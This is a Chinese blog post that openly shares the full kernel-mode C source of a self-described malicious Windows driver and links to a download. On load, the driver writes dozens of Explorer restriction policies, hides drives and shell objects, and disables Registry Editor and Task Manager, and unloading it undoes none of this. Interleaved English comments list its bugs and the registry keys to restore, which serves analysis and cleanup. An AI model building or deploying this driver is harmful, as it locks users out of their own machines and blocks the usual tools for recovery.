能够完成这个恶意程序我先要感谢一下牛人医生wulongxian。这个驱动程序是按照他提供的一些资料实现的,也感谢他一直以来对我的支持。
大牛勿喷,吾等菜鸟消遣而已。
进入正题,这是一个可修复的恶意驱动程序,请在虚拟机测试。修复的方法大家看代码就知道了。不过有一点难度,各显神通吧!希望大家能把修复的方法贴出来。如果不能确定自己能修复,建议在虚拟机里安装一个QQ,以防万一。本人方法暂时不公布……
这个驱动可用于系统保护,本来想添加重启的,但是怕大家误会,所以请手动重启。驱动加载后的效果请大家测试 (重启,记得重启),我就不多说了。
为了秉持不作恶的原则,这里将会把源代码完全贴出来,希望大家不要拿去做坏事。思路我就不多说了,代码注释很多……
我的测试环境是WIN7,如果想在XP里面测试,请重新编译源代码。
有附件,去下载吧!
//头文件
//博客:http://blog.csdn.net/fsjaky
//作者:fsjaky
#include<ntddk.h>
/*
 * Value names written as REG_DWORD under the per-user key
 *   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
 * by SetRegKeyDWord(); entry k pairs with ExplorerKeyValue[k] below.
 *
 * NOTE(review): the array is declared CHAR* but every initializer is a wide
 * (L"...") literal; the callers cast each entry back to PCWSTR, so it works,
 * but the element type should be WCHAR* / PCWSTR.
 *
 * For restoring an affected machine these 57 names are the values that have to
 * be removed (or reset) under that key.
 */
CHAR *ExplorerValueName[57]={
    L"NoDriveTypeAutoRun",
    L"NoStartMenuSubFolders",
    L"NoSMConfigurePrograms",
    L"NoToolbarsOnTaskbar",
    L"NoUserNameInStartMenu",
    L"NoStartMenuPinnedList",
    L"NoStartMenuMFUprogramsList",
    L"NoStartMenuEjectPC",
    L"NoStartMenuMorePrograms",
    L"NoSMBalloonTip",
    L"NoSimpleStartMenu",
    L"NoAutoTrayNotify",
    L"NoTaskGrouping",
    L"GreyMSIAds",
    L"NoResolveTrack",
    L"MemCheckBoxInRunDlg",
    L"NoResolveSearch",
    L"NoInstrumentation",
    L"ClearRecentDocsOnExit",
    L"Intellimenus",
    L"NoRecentDocsHistory",
    L"NoTrayContextMenu",
    L"NoSetTaskbar",
    L"NoChangeStartMenu",
    L"ForceStartMenuLogOff",
    L"NoStartMenuNetworkPlaces",
    L"NoStartMenuMyMusic",
    L"NoRun",
    L"NoSMMyPictures",
    L"NoSMHelp",
    L"NoFind",
    L"NoFavoritesMenu",
    L"NoNetworkConnections",
    L"NoSetFolders",
    L"NoRecentDocsMenu",
    L"NoSMMyDocs",
    L"NoCommonGroups",
    L"NoWindowsUpdate",
    L"ForceClassicControlPanel",
    L"NoWelcomeScreen",
    L"NoLogoff",
    L"NoDesktopCleanupWizard",
    L"NoSaveSettings",
    L"NoMovingBands",
    L"DisablePersonalDirChange",
    L"NoCloseDragDropBands",
    L"NoRecentDocsNetHood",
    L"NoInternetIcon",
    L"NoNetHood",
    L"NoPropertiesMyComputer",
    L"NoPropertiesRecycleBin",
    L"NoPropertiesMyDocuments",
    L"NoDrives",
    L"NoViewOnDrive",
    L"NoDesktop",
    L"NoControlPanel",
    L"HonorAutoRunSetting"
};
/*
 * REG_DWORD data for the Explorer policy values, parallel to ExplorerValueName.
 * Index 0 (NoDriveTypeAutoRun) is 255 (0xFF); indexes 52 and 53 (NoDrives,
 * NoViewOnDrive) are 67108855 (0x3FFFFF7), which by name are drive bitmasks —
 * which drive letters that mask covers is not established by this file; every
 * other entry is 1.
 */
ULONG ExplorerKeyValue[57]={
    255,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    67108855, /* NoDrives */
    67108855, /* NoViewOnDrive */
    1,
    1,
    1
};
/*
 * Value names written as REG_DWORD under
 *   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum
 * by SetRegNoEnumOrSystem(..., 1); entry k pairs with NonEnumKeyValue[k].
 * The names are CLSID strings; which shell namespace objects they denote is not
 * stated in this file. Same CHAR*-vs-wide-literal type mismatch as
 * ExplorerValueName.
 */
CHAR *NonEnumValueName[6]={
    L"{BDEADF00-C265-11D0-BCED-00A0C90AB50F}",
    L"{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}",
    L"{0DF44EAA-FF21-4412-828E-260A8728E7F1}",
    L"{645FF040-5081-101B-9F08-00AA002F954E}",
    L"{450D8FBA-AD25-11D0-98A8-0800361B1103}",
    L"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
};
/*
 * REG_DWORD data for the NonEnum values, parallel to NonEnumValueName.
 * Index 1 is 1073741857 (0x40000021) and index 2 is 32 (0x20); the meaning of
 * those bit patterns is not established here.
 */
ULONG NonEnumKeyValue[6]={
    1,
    1073741857, /* 0x40000021 */
    32,         /* 0x20 */
    1,
    1,
    1
};
/*
 * Value names written as REG_DWORD under
 *   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system
 * by SetRegNoEnumOrSystem(..., 2); entry k pairs with SystemKeyValue[k].
 * Same CHAR*-vs-wide-literal type mismatch as ExplorerValueName.
 *
 * Defender note: DisableRegistryTools and DisableTaskMgr are in this list, so
 * the usual interactive tools for inspecting/undoing the change are themselves
 * switched off; restoring means editing these values by other means (for
 * example from another profile or offline).
 */
CHAR *SystemValueName[9]={
    L"dontdisplaylastusername",
    L"legalnoticecaption",
    L"legalnoticetext",
    L"shutdownwithoutlogon",
    L"undockwithoutlogon",
    L"DisableRegistryTools",
    L"DisableTaskMgr",
    L"DisableLockWorkstation",
    L"DisableChangePassword"
};
/*
 * REG_DWORD data for the system policy values, parallel to SystemValueName.
 * NOTE(review): the leftover comments on legalnoticecaption/legalnoticetext
 * ("0" / NULL) suggest those two were meant to be string values, but
 * SetRegNoEnumOrSystem writes every entry as REG_DWORD, so they are stored as
 * DWORD 0 here.
 */
ULONG SystemKeyValue[9]={
    0,
    0, /* legalnoticecaption: written as DWORD 0 (original note: "0"/NULL) */
    0, /* legalnoticetext:    written as DWORD 0 (original note: "0"/NULL) */
    1,
    1,
    2, /* DisableRegistryTools */
    1, /* DisableTaskMgr */
    1,
    1
};
//.c文件
//博客:http://blog.csdn.net/fsjaky
//作者:fsjaky
#include <ntddk.h>
#include <Ntstrsafe.h>
#include "RegeditValue.h"
/* Registry paths used by this driver (kernel object-manager form). */
#define MY_REG_SOFTWARE_KEY_NAME L"\\Registry\\User"  /* NOTE(review): not referenced anywhere in this file */
#define MY_REG_NOENUM L"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\NonEnum"
#define MY_REG_SYSTEM L"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system"
/*
 * Path of the logged-on user's hive ("\Registry\User\<profile subkey>"), filled by
 * GetCurrentUserPath(). DriverEntry appends the Explorer policy subpath to it and
 * releases the buffer with RtlFreeUnicodeString once the Explorer values are
 * written. Until GetCurrentUserPath finds a profile with RefCount > 0 it is the
 * zero-initialized global (Buffer NULL, both lengths 0).
 */
UNICODE_STRING StringOfRegCurrentUser;
/*
 * Unused: the "i++" counters that referenced it are commented out, and
 * GetCurrentUserPath declares a local ULONG i that shadows this one.
 */
DWORD i = 0;
/*
 * Locate the registry path of the logged-on user's hive (what HKEY_CURRENT_USER
 * maps to) from kernel mode and store it in the global StringOfRegCurrentUser.
 *
 * Method, as coded: enumerate the subkeys of
 *   \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
 * and, for every subkey whose name is longer than 20 bytes (10 WCHARs), read its
 * REG_DWORD "RefCount". If that is > 0, "\Registry\User\<subkey name>" is copied
 * into a newly allocated PagedPool buffer owned by StringOfRegCurrentUser.
 *
 * Parameters: none.
 * Return: none (results are communicated through StringOfRegCurrentUser).
 * Ownership: StringOfRegCurrentUser.Buffer is freed by DriverEntry via
 *            RtlFreeUnicodeString.
 *
 * NOTE(review) — defects visible in this body:
 *  - The status of ZwOpenKey, ZwQueryKey, ZwEnumerateKey and
 *    RtlQueryRegistryValues is never checked; hRegister and pfi are used as if
 *    every call succeeded.
 *  - pbi is allocated on every loop iteration but freed only once after the
 *    loop, so every allocation except the last leaks.
 *  - If more than one profile has RefCount > 0, StringOfRegCurrentUser.Buffer is
 *    allocated again and the earlier buffer leaks; only the last match survives.
 *  - The local buffers hold 256 WCHARs, but the global gets MaximumLength 256,
 *    which is 256 bytes (128 WCHARs): RtlCopyUnicodeString truncates silently
 *    if the path is longer.
 *  - The ">20 bytes" test is a heuristic, presumably meant to skip short profile
 *    names and keep SID-shaped ones; it is not validated here.
 *  - The local `i` shadows the file-scope DWORD i.
 */
VOID GetCurrentUserPath()
{
    HANDLE hRegister;
    OBJECT_ATTRIBUTES ObjectAttributes;
    ULONG ulSize;
    PKEY_FULL_INFORMATION pfi;
    ULONG i;
    PKEY_BASIC_INFORMATION pbi = NULL;
    UNICODE_STRING uniKeyName;
    WCHAR CurrentUserbuf[256];
    WCHAR ProfileListbuf[256];
    UNICODE_STRING RegCurrentUser,RegUser;
    UNICODE_STRING RegProfileList,RegProf;
    RTL_QUERY_REGISTRY_TABLE paramTable[2];
    ULONG udefaultData=0;
    ULONG uQueryValue;
    KdPrint(("Entry GetCurrentUserPath\n"));
    /* Query table: read REG_DWORD "RefCount" straight into uQueryValue
     * (RTL_QUERY_REGISTRY_DIRECT); when the value is absent udefaultData (0) is
     * used instead. paramTable[1] stays zeroed as the terminator. */
    RtlZeroMemory(paramTable,sizeof(paramTable));
    paramTable[0].Flags=RTL_QUERY_REGISTRY_DIRECT;
    paramTable[0].Name=L"RefCount";
    paramTable[0].EntryContext=&uQueryValue;
    paramTable[0].DefaultType=REG_DWORD;
    paramTable[0].DefaultData=&udefaultData;
    paramTable[0].DefaultLength=sizeof(ULONG);
    /* Constant prefixes; both are re-copied into the work buffers after each subkey. */
    RtlInitUnicodeString(&RegProf,L"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\");
    RtlInitUnicodeString(&RegUser,L"\\Registry\\User\\");
    /* Work buffers: 256 WCHARs each (MaximumLength is in bytes). */
    RtlInitEmptyUnicodeString(&RegCurrentUser,CurrentUserbuf,256*sizeof(WCHAR));
    RtlInitEmptyUnicodeString(&RegProfileList,ProfileListbuf,256*sizeof(WCHAR));
    RtlCopyUnicodeString(&RegCurrentUser,&RegUser);
    RtlCopyUnicodeString(&RegProfileList,&RegProf);
    InitializeObjectAttributes(&ObjectAttributes,&RegProf,OBJ_CASE_INSENSITIVE,NULL,NULL);
    /* NOTE(review): status unchecked — hRegister is uninitialized if this fails. */
    ZwOpenKey(&hRegister,KEY_ALL_ACCESS,&ObjectAttributes);
    /* Two-step query: first call obtains the required size, second fills pfi. */
    ZwQueryKey(hRegister,KeyFullInformation,NULL,0,&ulSize);
    pfi=(PKEY_FULL_INFORMATION)ExAllocatePool(PagedPool,ulSize);
    ZwQueryKey(hRegister,KeyFullInformation,pfi,ulSize,&ulSize);
    for (i=0;i<pfi->SubKeys;i++)
    {
        /* Same size-then-fill pattern for each subkey's basic information. */
        ZwEnumerateKey(hRegister,
            i,
            KeyBasicInformation,
            NULL,
            0,
            &ulSize);
        /* NOTE(review): allocated per iteration, freed only once after the loop. */
        pbi =(PKEY_BASIC_INFORMATION)ExAllocatePool(PagedPool,ulSize);
        ZwEnumerateKey(hRegister, i, KeyBasicInformation, pbi, ulSize, &ulSize);
        /* Wrap the (non-terminated) subkey name; NameLength is in bytes. */
        uniKeyName.Length =
        uniKeyName.MaximumLength =(USHORT)pbi->NameLength;
        uniKeyName.Buffer = pbi->Name;
        if (pbi->NameLength>20) /* heuristic: names longer than 10 WCHARs */
        {
            RtlAppendUnicodeStringToString(&RegCurrentUser,&uniKeyName);
            RtlAppendUnicodeStringToString(&RegProfileList,&uniKeyName);
            /* Read ProfileList\<subkey>\RefCount into uQueryValue (0 if absent). */
            RtlQueryRegistryValues(RTL_REGISTRY_ABSOLUTE,RegProfileList.Buffer,paramTable,NULL,NULL);
            if (uQueryValue>0)
            {
                KdPrint(("HKET_CURRENT_USER: %wZ\n",&RegCurrentUser));
                /* NOTE(review): 256 here is bytes = 128 WCHARs, half the size of
                 * CurrentUserbuf; a second match re-allocates and leaks this buffer. */
                StringOfRegCurrentUser.Buffer = (PWSTR)ExAllocatePool (PagedPool,256);
                StringOfRegCurrentUser.MaximumLength = 256;
                RtlCopyUnicodeString(&StringOfRegCurrentUser,&RegCurrentUser);
                KdPrint(("Want To Change Key is:%wZ\n",&StringOfRegCurrentUser));
            }
        }
        /* Reset both work strings to their prefixes for the next subkey. */
        RtlCopyUnicodeString(&RegCurrentUser,&RegUser);
        RtlCopyUnicodeString(&RegProfileList,&RegProf);
    }
    ExFreePool(pbi);
    ExFreePool(pfi);
    KdPrint(("Leave GetCurrentUserPath\n"));
    ZwClose(hRegister);
}
/*
 * Write one REG_DWORD value under the per-user Explorer policy key
 *   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.
 * The key path is taken from the global StringOfRegCurrentUser, which DriverEntry
 * has already extended with the Explorer subpath before the first call.
 *
 * Parameters:
 *   ArrayValueName - table of value names (wide literals despite the CHAR* type)
 *   ArrayKeyValue  - table of DWORD data, parallel to ArrayValueName
 *   n              - index of the entry to write (one value per call; the original
 *                    comment called it "number of items", but it is used as an index)
 * Return: none. Failures are only reported through KdPrint.
 *
 * NOTE(review):
 *  - If ZwOpenKey fails, hRegister is left uninitialized and is still passed to
 *    ZwSetValueKey and ZwClose.
 *  - ZwSetValueKey's status is ignored.
 *  - A 256-byte (128 WCHAR) PagedPool copy of the path is made on every call and
 *    released with RtlFreeUnicodeString; opening the key once for all 57 writes
 *    would avoid that, but the per-call pattern is what this code does.
 */
VOID SetRegKeyDWord(CHAR* ArrayValueName[],ULONG ArrayKeyValue[],int n)
{
    UNICODE_STRING RegUnicodeString;
    HANDLE hRegister;
    OBJECT_ATTRIBUTES objectAttributes;
    UNICODE_STRING ValueName; // name of the REG_DWORD value
    ULONG ulValue ; // value data
    NTSTATUS ntStatus;
    /* Private copy of the key path (MaximumLength is in bytes: 128 WCHARs). */
    RegUnicodeString.Buffer = (PWSTR)ExAllocatePool (PagedPool,256);
    RegUnicodeString.MaximumLength =256;
    RtlCopyUnicodeString(&RegUnicodeString,&StringOfRegCurrentUser);
    // initialize objectAttributes
    InitializeObjectAttributes(&objectAttributes,
        &RegUnicodeString,
        OBJ_CASE_INSENSITIVE,// case-insensitive name lookup
        NULL,
        NULL );
    // open the key
    ntStatus = ZwOpenKey( &hRegister,KEY_ALL_ACCESS,&objectAttributes);
    if (NT_SUCCESS(ntStatus))
    {
        KdPrint(("Open register successfully\n"));
    }
    else
    {
        /* NOTE(review): only logged; execution continues with an invalid handle. */
        KdPrint(("Open register fail\n"));
    }
    // initialize ValueName from the (wide) entry selected by n
    RtlInitUnicodeString( &ValueName, (PCWSTR)ArrayValueName[n]);
    //KdPrint(("ExplorerValueName :%wZ\n",&ValueName));
    // set the REG_DWORD value
    ulValue = ArrayKeyValue[n];
    //KdPrint(("DWORD Key Value:%d cout:%d\n",ulValue,i));
    //i++; // counter (disabled)
    KdPrint(("ZwSetValueKey\n"));
    /* NOTE(review): status unchecked. */
    ZwSetValueKey(hRegister,
        &ValueName,
        0,
        REG_DWORD,
        &ulValue,
        sizeof(ulValue));
    KdPrint(("Leave SetRegKeyDWord\n"));
    RtlFreeUnicodeString (&RegUnicodeString);
    // close the key handle
    ZwClose(hRegister);
}
/*
 * Create (or open) one of two machine-wide policy keys and write a single
 * REG_DWORD value there:
 *   falgs == 1 -> MY_REG_NOENUM  (HKLM\...\Policies\NonEnum)
 *   falgs == 2 -> MY_REG_SYSTEM  (HKLM\...\Policies\system)
 * (The original header said HKEY_CURRENT_USER; the macros actually used are
 * under \Registry\Machine, i.e. HKEY_LOCAL_MACHINE.)
 *
 * Parameters:
 *   ArrayValueName - table of value names (wide literals despite the CHAR* type)
 *   ArrayKeyValue  - table of DWORD data, parallel to ArrayValueName
 *   n              - index of the entry to write (one value per call)
 *   falgs          - (sic, "flags") selects the key as listed above
 * Return: none. Status codes are logged but never acted upon.
 *
 * NOTE(review):
 *  - For any falgs other than 1 or 2, RegUnicodeString is never initialized but
 *    is still used to build objectAttributes.
 *  - The handle returned by ZwCreateKey is overwritten by the following
 *    ZwOpenKey without being closed, so one handle leaks per call; the second
 *    open is redundant since ZwCreateKey already yields an open handle.
 *  - If both calls fail, hRegister is uninitialized when passed to
 *    ZwSetValueKey / ZwClose.
 *  - ZwSetValueKey's status is ignored.
 */
VOID SetRegNoEnumOrSystem(CHAR* ArrayValueName[],ULONG ArrayKeyValue[],int n,int falgs)
{
    UNICODE_STRING RegUnicodeString;
    HANDLE hRegister;
    UNICODE_STRING ValueName;
    ULONG ulValue;
    OBJECT_ATTRIBUTES objectAttributes;
    NTSTATUS ntStatus;
    ULONG ulResult;
    KdPrint(("Entry SetRegNoEnumOrSystem\n"));
    // initialize the UNICODE_STRING key path (no else branch: other values leave it uninitialized)
    if(falgs == 1) // NonEnum
        RtlInitUnicodeString( &RegUnicodeString, MY_REG_NOENUM);
    else if(falgs == 2) // system
        RtlInitUnicodeString( &RegUnicodeString, MY_REG_SYSTEM);
    //KdPrint(("Open register %wZ\n",&RegUnicodeString));
    // initialize objectAttributes
    InitializeObjectAttributes(&objectAttributes,
        &RegUnicodeString,
        OBJ_CASE_INSENSITIVE,// case-insensitive name lookup
        NULL,
        NULL );
    // create the key (or open it if it already exists)
    ntStatus = ZwCreateKey( &hRegister,
        KEY_ALL_ACCESS,
        &objectAttributes,
        0,
        NULL,
        REG_OPTION_NON_VOLATILE,
        &ulResult);
    if (NT_SUCCESS(ntStatus))
    {
        // report whether it was created or merely opened
        if(ulResult==REG_CREATED_NEW_KEY)
        {
            KdPrint(("The register item is created\n"));
        }
        else if(ulResult==REG_OPENED_EXISTING_KEY)
        {
            KdPrint(("The register item has been created,and now is opened\n"));
        }
    }
    // open the key again
    /* NOTE(review): overwrites the handle from ZwCreateKey without closing it. */
    ntStatus = ZwOpenKey( &hRegister,KEY_ALL_ACCESS,&objectAttributes);
    if (NT_SUCCESS(ntStatus))
    {
        KdPrint(("Open register successfully\n"));
    }
    else
    {
        KdPrint(("Open register Fail\n"));
    }
    // initialize ValueName from the (wide) entry selected by n
    RtlInitUnicodeString( &ValueName, (PCWSTR)ArrayValueName[n]);
    //KdPrint(("ExplorerValueName :%wZ\n",&ValueName));
    // set the REG_DWORD value
    ulValue = ArrayKeyValue[n];
    //KdPrint(("DWORD Key Value:%d cout:%d\n",ulValue,i));
    //i++; // counter (disabled)
    /* NOTE(review): status unchecked. */
    ZwSetValueKey(hRegister,
        &ValueName,
        0,
        REG_DWORD,
        &ulValue,
        sizeof(ulValue));
    KdPrint(("Leave SetRegNoEnumOrSystem\n"));
    // close the key handle
    ZwClose(hRegister);
}
/*
 * Unload routine. It only prints "UnLoad!"; none of the registry values written
 * by DriverEntry are removed, so unloading the driver does not undo its effect
 * (the values persist in the registry after the driver is gone).
 *
 * NOTE(review): DriverObject->DriverUnload expects a DRIVER_UNLOAD, which
 * returns VOID; this routine is declared NTSTATUS and has no return statement,
 * so the assignment in DriverEntry is a type mismatch and the declared return
 * value is never produced. It should be `VOID DriverUnLoad(PDRIVER_OBJECT)`.
 */
NTSTATUS DriverUnLoad(PDRIVER_OBJECT DriverObject)
{
    DbgPrint("UnLoad!");
}
/*
 * Driver entry point. Sequence:
 *  1. register DriverUnLoad (whose signature does not match DRIVER_UNLOAD);
 *  2. GetCurrentUserPath() fills StringOfRegCurrentUser with
 *     "\Registry\User\<profile subkey>" of the profile with RefCount > 0;
 *  3. append "\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer";
 *  4. write the 57 Explorer policy DWORDs, then free StringOfRegCurrentUser;
 *  5. write the 6 NonEnum values and the 9 system policy values under HKLM.
 *
 * Parameters: DriverObject (only DriverUnload is set); reg_path is unused.
 * Return: STATUS_SUCCESS unconditionally — the driver stays loaded even when
 *         step 2 found nothing or step 3 overflowed (those cases are only logged).
 *
 * NOTE(review):
 *  - The loop bounds 57 / 6 / 9 duplicate the array sizes in RegeditValue.h and
 *    have to be kept in sync by hand.
 *  - If GetCurrentUserPath() matched no profile, StringOfRegCurrentUser is still
 *    the zero-initialized global (Buffer NULL, MaximumLength 0); the concatenation
 *    then has no room — presumably reported as STATUS_BUFFER_OVERFLOW — yet the
 *    Explorer loop still runs against that unusable path.
 *  - StringOfRegCurrentUser.MaximumLength is 256 bytes (128 WCHARs); a SID-based
 *    profile path plus the Explorer suffix is close to that limit, which is what
 *    the STATUS_BUFFER_OVERFLOW branch would report.
 *  - KeyValue and ValueName are unused locals.
 *
 * Defender note: the full set of registry locations this driver modifies is the
 * per-user Explorer policy key built in step 3 plus MY_REG_NOENUM and
 * MY_REG_SYSTEM; those three keys (and the value names in RegeditValue.h) are
 * what to audit and restore on an affected machine, since DriverUnLoad does not
 * revert anything.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject , PUNICODE_STRING reg_path)
{
    ULONG n;
    ULONG KeyValue;   // unused
    UNICODE_STRING ValueName; // unused
    NTSTATUS ntStatus;
    UNICODE_STRING temp={0};
    KdPrint(("Entry DriverEntry\n"));
    DriverObject->DriverUnload = DriverUnLoad; /* NOTE(review): DriverUnLoad returns NTSTATUS, not VOID */
    GetCurrentUserPath(); // resolve the logged-on user's hive path into StringOfRegCurrentUser
    // initialize the UNICODE_STRING suffix and append it to the hive path
    RtlInitUnicodeString( &temp, L"\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
    ntStatus = RtlUnicodeStringCat(&StringOfRegCurrentUser,&temp);
    if(STATUS_SUCCESS == ntStatus)
    {
        KdPrint(("Temp String KEY_EXPLORER is:%wZ\n",&temp));
        KdPrint(("The new Open Key is:%wZ\n",&StringOfRegCurrentUser));
    }
    else if(STATUS_BUFFER_OVERFLOW == ntStatus)
    {
        /* NOTE(review): logged only; the Explorer loop below still runs. */
        KdPrint((" STATUS_BUFFER_OVERFLOW\n"));
    }
    else if(STATUS_INVALID_PARAMETER == ntStatus)
    {
        KdPrint(("STATUS_INVALID_PARAMETER\n"));
    }
    /* One ZwOpenKey/ZwSetValueKey/ZwClose round trip per Explorer value. */
    for(n = 0; n<57; n++)
    {
        SetRegKeyDWord(ExplorerValueName,ExplorerKeyValue,n);
    }
    RtlFreeUnicodeString(&StringOfRegCurrentUser ); // release the hive-path buffer once the values are written
    // add the NonEnum values (falgs == 1 -> MY_REG_NOENUM)
    for(n = 0; n<6; n++)
        SetRegNoEnumOrSystem(NonEnumValueName,NonEnumKeyValue,n,1);
    // add the system policy values (falgs == 2 -> MY_REG_SYSTEM)
    for(n = 0; n<9; n++)
        SetRegNoEnumOrSystem(SystemValueName,SystemKeyValue,n,2);
    KdPrint(("Leave DriverEntry\n"));
    return STATUS_SUCCESS;
}
有附件,去下载吧!